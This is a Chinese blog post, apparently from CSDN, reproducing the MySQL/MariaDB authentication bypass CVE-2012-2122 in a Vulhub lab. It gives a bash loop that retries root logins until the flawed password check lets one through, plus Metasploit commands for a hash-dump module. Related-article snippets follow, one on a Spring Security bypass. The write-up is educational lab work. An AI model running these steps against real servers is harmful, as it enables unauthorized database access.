【vulhub】MySql身份认证绕过漏洞复现(CVE-2012-2122)

最新推荐文章于 2024-08-09 09:10:12 发布
最新推荐文章于 2024-08-09 09:10:12 发布
阅读量1.8k 收藏 1
点赞数 1
分类专栏: Vulhub漏洞复现 文章标签: mysql 数据库 sql 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_51295677/article/details/126222391
版权

影响版本:

MySQL 5.1.x before 5.1.63,

                5.5.x before 5.5.24,

                5.6.x before 5.6.6,

 MariaDB 5.1.x before 5.1.62,

                5.2.x before 5.2.12

                5.3.x before 5.3.6

                5.x before 5.5.23

漏洞出现的原理:

当连接MariaDB/MySQL时,输入的密码会与期望的正确密码比较,由于不正确的处理,会导致即便是memcmp()返回一个非零值,也会使MySQL认为两个密码是相同的。也就是说只要知道用户名且支持远程登录,然后不断尝试就能够直接登入SQL数据库。还有一个方法 msfconsole工具利用其带的SQL语句爆出密码,但是经过自己的测试发现无法得到密码(这里msf用的是自己服务器上搭的,可能存在问题)。

漏洞复现

法一:脚本循环爆破

正常登录:

用户:root 密码:123456

不正常就不会登录成功,但是如果写一个脚本循环进行登录就会出现开始说的MySQL可能出现的问题,如下:

#mysql.sh
for ((i = 1; i < 1000; i++))
do      
        mysql -h 127.0.0.1 -u root -p1234 -P 3306;
done

执行命令:bash mysql.sh

可以看到,即使前面一直在报错,但是到达了某一步时还是会登录成功,并且是拥有可执行查询权限的。

法二:metasploit工具打

这个工具kali自带,之前打红日2的时候用过,没有kali的可以参考安装教程:https://jingyan.baidu.com/article/2c8c281dabacad0008252aa6.html

步骤如下:

msfconsole
use auxiliary/scanner/mysql/mysql_authbypass_hashdump
set RHOSTS 你的外网IP
set THREADS 100
run

可惜了,一直不出结果,有可能是我搭的这个msf有问题还是啥的,MySQL的远程连接、错误连接次数的限制都改了还是不行,工作的电脑没有装kali,回去用自己电脑的kali试试吧。

 

参考:身份认证绕过漏洞复现 CVE-2012-2122 - 网安

CVE-2012-2122漏洞复现_muddlelife的博客-优快云博客_cve-2012-2122

CVE-2012-2122Mysql身份认证漏洞
weixin_45253622的博客
05-27 6457
目录 漏洞描述 影响版本 漏洞复现 使用MSF进行检测: 使用Linux执行命令进行爆破复现: ​使用python脚本进行复现漏洞修复 漏洞描述 当连接MariaDB/MySQL时,输入的密码会与期望的正确密码比较,由于不正确的处理,会导致即便是memcmp()返回一个非零值,也会使MySQL认为两个密码是相同的。 也就是说只要知道用户名,不断尝试就能够直接登入SQL数据库。按照公告说法大约256次就能够蒙对一次。 影响版本 MariaDB versions from 5.1...
Vulhubmysql CVE-2012-2122
xueyuel的博客
11-10 1048
vulhubmysql身份验证绕过漏洞
Mysql 身份认证绕过漏洞CVE-2012-2122复现
weixin_57379923的博客
08-09 1041
这段代码的主要目的是尝试通过 MySQL 客户端连接到指定的数据库服务器,重定向错误输出以保持输出简洁。版 权 声 明:本博客所有文章除特别声明外,均采用。文章版权归作者所有,未经允许请勿转载!靶机:IP:192.168.100.40。作 者:PeiyuJue。将这些数字赋值给变量。
Mysql 身份认证绕过漏洞CVE-2012-2122
m0_65354386的博客
07-05 296
环境启动后,将启动一个Mysql服务(版本:5.5.23),监听3306端口,可以在攻击机直接采用shell脚本进行攻击连接数据库漏洞环境使用vulhub搭建,漏洞目录为vulhub/mysql/CVE-2012-2122。可以先进行正常连接看看是否成功: mysql -h IP -uroot -p123456。拉取镜像启动容器:docker-compose up -d。可以看到在经过多次尝试后成功连接数据库,即复现成功。IP为存在此漏洞的kali的IP,即靶机。在靶机搭建环境并启动容器。
mysql身份认证绕过漏洞复现CVE-2012-2122
weixin_53730939的博客
03-12 1727
mysql身份认证绕过漏洞复现CVE-2012-2122
vulhub漏洞复现 Mysql 身份认证绕过漏洞CVE-2012-2122
m0_56135391的博客
04-15 2731
环境:ubantu服务器(docker),kali攻击机 漏洞简介: 当连接 MariaDB/MySQL 时,输入的密码会与期望的正确密码比较,由于不正确的处理,会导致即便是 memcmp () 返回一个非零值,也会使 MySQL 认为两个密码是相同的。也就是说只要知道用户名,不断尝试就能够直接登入 SQL 数据库。出现这个漏洞是由于memcmp函数只返回返回-128到127范围内的值,在某些平台上进行了优化,导致即便是memcmp()返回一个非零值,也会使MySQL认为两个密码是相同的。大约256次就
Vulhub复现mysql身份认证绕过漏洞CVE-2012-2122
qq_51331767的博客
03-17 391
当连接MariaDB/MySQL时,输入的密码会与期望的正确密码比较,由于不正确的处理,会导致即便是memcmp()返回一个非零值,也会使MySQL认为两个密码是相同的。我们可以使用Meterpreter中的模块或者使用特殊的SQL语句进行身份绕过登录,出现这个漏洞是由于memcmp函数只返回返回-128到127范围内的值,在某些平台上进行了优化,导致即便是memcmp()返回一个非零值,也会使MySQL认为两个密码是相同的。爆破多次即绕过身份验证,成功登录数据库复现成功。2、访问3306端口查看环境。
MySql身份认证绕过漏洞(CVE-2012-2122)
dgjkkhcf的博客
07-24 4892
当连接MariaDB/MySQL时,输入的密码会与期望的正确密码比较,由于不正确的处理,会导致即便是memcmp()返回一个非零值,也会使MySQL认为两个密码是相同的。也就是说只要知道用户名,不断尝试就能够直接登入SQL数据库。.........
Mysql身份认证绕过漏洞复现CVE-2012-2122
m0_74887243的博客
03-21 261
Mysql身份认证绕过漏洞复现CVE-2012-2122
Mysql身份验证绕过 漏洞CVE 2012-2122复现
weixin_72146684的博客
08-25 1397
在一个虚拟机中操作。
vulhub靶场mysql类型CVE-2012-2122漏洞复现
qq_58873970的博客
07-24 868
当连接MariaDB/MySQL时,输入的密码会与期望的正确密码比较,由于不正确的处理,会导致即便是memcmp()返回一个非零值,也会使MySQL认为两个密码是相同的。也就是说只要知道用户名,不断尝试就能够直接登入SQL数据库。按照公告说法大约256次就能够蒙对一次。
[漏洞复现]Mysql 身份认证绕过漏洞CVE-2012-2122
Vicl1fe的博客
12-24 3332
mysql身份验证绕过漏洞 出现这个漏洞
[转载]CVE-2012-2122: MySQL身份认证漏洞
weixin_33866037的博客
06-12 197
转自:https://www.sunchangming.com/blog/?p=4260 我今天早上来上班,打开电脑,在seclists中看到一个很惊人的邮件: http://seclists.org/oss-sec/2012/q2/493 MySQL爆出了一个很大的安全漏洞,几乎影响5.1至5.5的所有版本。出问题的模块是登录时密码校验的部分(password.c),...
Vulhub-Mysql 身份认证绕过漏洞CVE-2012-2122
weixin_45540609的博客
09-08 979
一、漏洞简介 当连接MariaDB/MySQL时,输入的密码会与期望的正确密码比较,由于不正确的处理,会导致即便是memcmp()返回一个非零值,也会使MySQL认为两个密码是相同的。 也就是说只要知道用户名,不断尝试就能够直接登入SQL数据库。按照公告说法大约256次就能够蒙对一次。 二、漏洞范围 MariaDB versions from 5.1.62, 5.2.12, 5.3.6, 5.5.23 are not. MySQL versions from 5.1.63, 5.5.24, 5.
Mysql身份认证漏洞复现(CVE-2012-2122)
又菜又爱倒腾的博客
10-29 2541
#Mysql身份认证漏洞(CVE-2012-2122)# 一、漏洞简介 当连接MariaDB/MySQL时,输入的密码会与期望的正确密码比较,由于不正确的处理,会导致即便是memcmp()返回一个非零值,也会使MySQL认为两个密码是相同的。 也就是说只要知道用户名,不断尝试就能够直接登入SQL数据库。按照公告说法大约256次就能够蒙对一次。 二、漏洞影响 影响版本 MariaDB versions from 5.1.62, 5.2.12, 5.3.6, 5.5.23 are not. MySQL vers
Spring Security 身份验证绕过漏洞(CVE-2024-22257)
最新发布
01-23
### 关于 Spring Security 中 CVE-2024-22257 漏洞详情 Spring Security 存在一个身份验证绕过漏洞,编号为CVE-2024-22257。此漏洞源于`AuthenticatedVoter#vote`方法在处理认证参数时未能正确检查null值的情况[^4]。 当应用程序调用`AuthenticatedVoter#vote`并传递null作为认证对象时,该方法错误地返回了true的结果。这使得未授权用户能够通过提供null认证信息来绕过系统的正常访问控制机制,进而可能执行越权操作或获取不应有的权限,甚至窃取系统内部的重要数据。 ```java // 易受攻击的代码片段展示 public int vote(Authentication authentication, Object object, Collection<ConfigAttribute> attributes) { if (authentication == null || !authentication.isAuthenticated()) { return ACCESS_DENIED; } // 如果传入的是null,则此处逻辑判断失误 return ACCESS_GRANTED; } ``` ### 影响范围与风险评估 受影响版本包括但不限于某些特定版本区间内的Spring Security框架实现。由于具体影响版本依赖官方通告更新,在实际环境中应当密切关注供应商发布的补丁说明文档以确认是否受到影响以及如何采取措施加以防范。 ### 修复建议 针对这一安全隐患,推荐开发者遵循如下指导方针: 1. **升级至最新稳定版**:尽快将使用的Spring Security库更新到最新的安全版本,通常新版本会包含对此类已知问题的有效修补程序。 2. **自定义投票器增强校验**:如果无法立即迁移至更高版本,可以在现有项目中重写或扩展默认的身份验证决策管理组件(如`AccessDecisionManager`),确保所有输入都经过严格的非空性和合法性检验后再参与后续流程判定。 3. **加强应用层防护策略**:除了依赖框架自带的安全特性外,还应考虑引入额外的应用级防御手段,比如API网关处设置预检规则过滤掉异常请求头/体结构;或是借助WAF(Web Application Firewall)类产品实施更广泛的流量监控和威胁拦截服务。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

errorr0

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值